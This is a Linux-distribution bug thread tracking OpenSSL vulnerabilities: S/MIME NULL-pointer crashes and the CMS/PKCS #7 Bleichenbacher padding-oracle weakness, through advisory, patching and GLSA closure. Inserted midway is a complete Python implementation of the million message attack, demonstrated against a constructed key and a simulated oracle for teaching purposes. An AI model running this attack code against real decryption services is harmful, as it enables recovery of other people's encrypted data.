A vulnerability has been reported in OpenSSL, which can be exploited by malicious people to cause a DoS (Denial of Service) of the application using the library.
The vulnerability is caused due to a NULL-pointer dereference error in the "mime_hdr_cmp()" function (crypto/asn1/asn_mime.c) when parsing certain MIME headers and can be exploited to cause a crash.
The vulnerability is reported in versions 0.9.7i, 0.9.8t, and 1.0.0g. Other versions may also be affected.
Fixed in the CVS repository.
Provided and/or discovered by: Reported by Mats Nilsson to the openssl-dev mailing list.
Sorry guys, this is not my fault.
> Ok did some more research and here's what we got:
> First mention of this bug is in 2006:
> So please use CVE-2006-7248 for this issue.
Due to the Novell/kadu mis-paste this CVE needs to be re-issued. Please use CVE-2006-7250 for this OpenSSL issue.
The mime_hdr_cmp function in crypto/asn1/asn_mime.c in OpenSSL 0.9.8t and
earlier allows remote attackers to cause a denial of service (NULL pointer
dereference and application crash) via a crafted S/MIME message.
openssl 1.0.0h and 0.9.8u are now in the tree, which should fix this.
Looks like this is relevant too:
OpenSSL Security Advisory [12 Mar 2012]
CMS and S/MIME Bleichenbacher attack (CVE-2012-0884)
A weakness in the OpenSSL CMS and PKCS #7 code can be exploited
using Bleichenbacher's attack on PKCS #1 v1.5 RSA padding
also known as the million message attack (MMA).
Only users of CMS, PKCS #7, or S/MIME decryption operations are affected. A
successful attack needs on average 2^20 messages. In practice only automated
systems will be affected as humans will not be willing to process this many
SSL/TLS applications are *NOT* affected by this problem since the
SSL/TLS code does not use the PKCS#7 or CMS decryption code.
Thanks to Ivan Nestlerode <firstname.lastname@example.org> for discovering
The fix was developed by Stephen Henson of the OpenSSL core team.
Affected users should upgrade to OpenSSL 1.0.0h or 0.9.8u.
URL for this Security Advisory:
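The advisory above only sketches what the million message attack does. The following is an added illustration, not code from OpenSSL, from the advisory or from this bug: it recovers a PKCS #1 v1.5 plaintext from nothing but a yes/no answer to "did the decrypted block start with 00 02?", which is exactly the signal a CMS/PKCS #7 decryption leaks when a padding failure is reported (or times) differently from a success. The RSA key (built from two Mersenne primes), the fixed padding string, the message and the oracle class are all constructed here for the demonstration; the modulus is deliberately tiny so the run finishes in seconds, a real 2048-bit key needs on the order of the 2^20 queries the advisory quotes.

```python
"""Bleichenbacher (million message) attack against a PKCS #1 v1.5 padding oracle.
Added example with a constructed key and oracle; not OpenSSL code."""

# Constructed key (assumption for the demo): p = 2^127-1 and q = 2^107-1 are Mersenne
# primes, giving a 234-bit modulus that keeps the attack fast enough to run inline.
P = (1 << 127) - 1
Q = (1 << 107) - 1
N = P * Q
E = 65537
D = pow(E, -1, (P - 1) * (Q - 1))
K = (N.bit_length() + 7) // 8      # modulus length in bytes (30 here)
B = 1 << (8 * (K - 2))             # PKCS#1 v1.5 constant: 00 02 ... blocks lie in [2B, 3B)


def pkcs1_v15_pad(msg: bytes) -> int:
    """EB = 00 02 || PS || 00 || M, PS at least 8 non-zero bytes (fixed here for determinism)."""
    ps_len = K - 3 - len(msg)
    assert ps_len >= 8, "message too long for this modulus"
    ps = bytes((i % 255) + 1 for i in range(ps_len))   # constructed non-zero filler
    return int.from_bytes(b"\x00\x02" + ps + b"\x00" + msg, "big")


def pkcs1_v15_unpad(m: int) -> bytes:
    eb = m.to_bytes(K, "big")
    assert eb[:2] == b"\x00\x02"
    return eb[eb.index(b"\x00", 2) + 1:]


def encrypt(m: int) -> int:
    return pow(m, E, N)


def decrypt(c: int) -> int:
    return pow(c, D, N)


class PaddingOracle:
    """Models a decryptor that lets the caller observe padding failures.
    The leak is the distinguishable failure, not the plaintext itself."""

    def __init__(self) -> None:
        self.queries = 0

    def is_conforming(self, c: int) -> bool:
        self.queries += 1
        m = decrypt(c)
        return 2 * B <= m < 3 * B           # equivalent to "block starts with 00 02"


def ceil_div(a: int, b: int) -> int:
    return -(-a // b)


def bleichenbacher(c0: int, oracle: PaddingOracle) -> int:
    """Recover m from c0 = m^e mod N using only oracle.is_conforming().
    c0 is a genuine ciphertext, so it already conforms and the blinding step is skipped."""
    intervals = [(2 * B, 3 * B - 1)]
    s = ceil_div(N, 3 * B)
    i = 1
    while True:
        if i == 1 or len(intervals) > 1:
            # Steps 2a/2b: linear search for the next s with (s*m mod N) in [2B, 3B).
            if i > 1:
                s += 1
            while not oracle.is_conforming((c0 * pow(s, E, N)) % N):
                s += 1
        else:
            # Step 2c: one interval left, so jump s by whole multiples of N.
            a, b = intervals[0]
            r = ceil_div(2 * (b * s - 2 * B), N)
            found = False
            while not found:
                s_lo = ceil_div(2 * B + r * N, b)
                s_hi = (3 * B - 1 + r * N) // a
                for cand in range(s_lo, s_hi + 1):
                    if oracle.is_conforming((c0 * pow(cand, E, N)) % N):
                        s, found = cand, True
                        break
                r += 1
        # Step 3: every conforming s narrows the set of intervals m can lie in.
        narrowed = set()
        for a, b in intervals:
            r_lo = ceil_div(a * s - 3 * B + 1, N)
            r_hi = (b * s - 2 * B) // N
            for r in range(r_lo, r_hi + 1):
                na = max(a, ceil_div(2 * B + r * N, s))
                nb = min(b, (3 * B - 1 + r * N) // s)
                if na <= nb:
                    narrowed.add((na, nb))
        intervals = sorted(narrowed)
        # Step 4: a single one-element interval is the plaintext.
        if len(intervals) == 1 and intervals[0][0] == intervals[0][1]:
            return intervals[0][0]
        i += 1


def run_demo() -> tuple:
    """Encrypt a constructed message, recover it through the oracle, report the query count."""
    oracle = PaddingOracle()
    c0 = encrypt(pkcs1_v15_pad(b"attack at dawn"))   # constructed sample message
    recovered = pkcs1_v15_unpad(bleichenbacher(c0, oracle))
    return recovered, oracle.queries


if __name__ == "__main__":
    msg, n_queries = run_demo()
    print(msg, "recovered after", n_queries, "oracle queries")
```

The attacker never sees a plaintext; every query is just a modified ciphertext and a one-bit answer, which is why the advisory says only automated decryption paths are at risk and why the fix has to remove the distinguishable failure (a different error, a different timing, a different log line are all the same oracle) rather than merely rate-limit it.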
Arches, please test and mark stable:
Target keywords : "alpha amd64 arm hppa ia64 m68k ppc ppc64 s390 sh sparc x86"
Target keywords : "amd64 x86"
Stable for HPPA.
ppc and ppc64 done
Added to existing GLSA request.
The mime_param_cmp function in crypto/asn1/asn_mime.c in OpenSSL before
0.9.8u and 1.x before 1.0.0h allows remote attackers to cause a denial of
service (NULL pointer dereference and application crash) via a crafted
S/MIME message, a different vulnerability than CVE-2006-7250.
The implementation of Cryptographic Message Syntax (CMS) and PKCS #7 in
OpenSSL before 0.9.8u and 1.x before 1.0.0h does not properly restrict
certain oracle behavior, which makes it easier for context-dependent
attackers to decrypt data via a Million Message Attack (MMA) adaptive chosen
This issue was resolved and addressed in
GLSA 201312-03 at http://security.gentoo.org/glsa/glsa-201312-03.xml
by GLSA coordinator Chris Reffett (creffett).